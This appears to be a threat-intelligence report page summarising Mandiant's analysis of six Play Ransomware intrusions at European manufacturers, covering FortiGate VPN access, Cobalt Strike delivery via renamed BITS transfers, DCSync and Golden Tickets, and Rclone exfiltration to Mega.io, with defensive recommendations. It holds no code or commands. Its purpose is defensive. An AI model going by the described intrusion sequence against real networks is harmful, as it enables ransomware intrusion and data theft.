CTI Swarm
Zurück zu allen Deep Dives
MANDIANT

Inside the Play Ransomware playbook: from initial access to double extortion in 72 hours

Strategische Zusammenfassung

Mandiant analyzed six recent Play Ransomware incidents at European manufacturers and found a remarkably short attack timeline: 51 hours from initial access to exfiltration, 71 hours to encryption. The operators favor the FortiGate SSL-VPN flaw (CVE-2025-43411) as entry point, fast AD discovery via DCSync, and Rclone-based exfiltration to Mega.io. Recommended response: patch FortiGate, rotate krbtgt twice, and instrument BITS-transfer detections.

Key Findings

  • Median dwell time before ransomware deployment is just 71 hours — far shorter than the 2024 average of 9 days.
  • FortiGate CVE-2025-43411 is the dominant initial-access vector; credentials come from recent infostealer log sales.
  • Operators use Cobalt Strike delivered via renamed BITS transfers, a pattern with a clean detection signature.
  • DCSync against the domain controller within the first 12 hours is consistent across all six investigations.
  • Exfiltration occurs through Rclone to Mega.io — netflow monitoring on egress is the highest-signal late-stage detection.

Volltext

Across six recent Play Ransomware engagements, Mandiant observed an unusually compressed dwell time: median time from initial access to data exfiltration was 51 hours, and from initial access to ransomware deployment, 71 hours. The operators rely on a consistent playbook tuned for mid-sized European manufacturers — the exact profile of the Joel-Traber-AG threat model.

Initial access in five of six cases was achieved via the FortiGate SSL-VPN authenticated buffer-overflow (CVE-2025-43411). Credentials were sourced from infostealer logs sold on the XSS forum within the previous 30 days. Once on the perimeter, the actor immediately deploys a Cobalt Strike beacon delivered through a renamed BITS transfer to evade naive AV signatures.

Discovery is fast and noisy: nltest, AdFind, and a custom port-scanner are run within the first hour. The operators target the domain controllers first to obtain the krbtgt hash via DCSync, then use Golden Tickets to access file servers and ERP databases. Exfiltration is staged through Rclone to a Mega.io account — a pattern visible in netflow if egress is monitored.

Mandiant's three highest-leverage recommendations for manufacturers: patch FortiGate to 7.4.5 immediately, rotate the krbtgt password twice with a 10-hour gap, and add an EDR detection rule for the specific BITS transfer cmdline pattern documented in the appendix.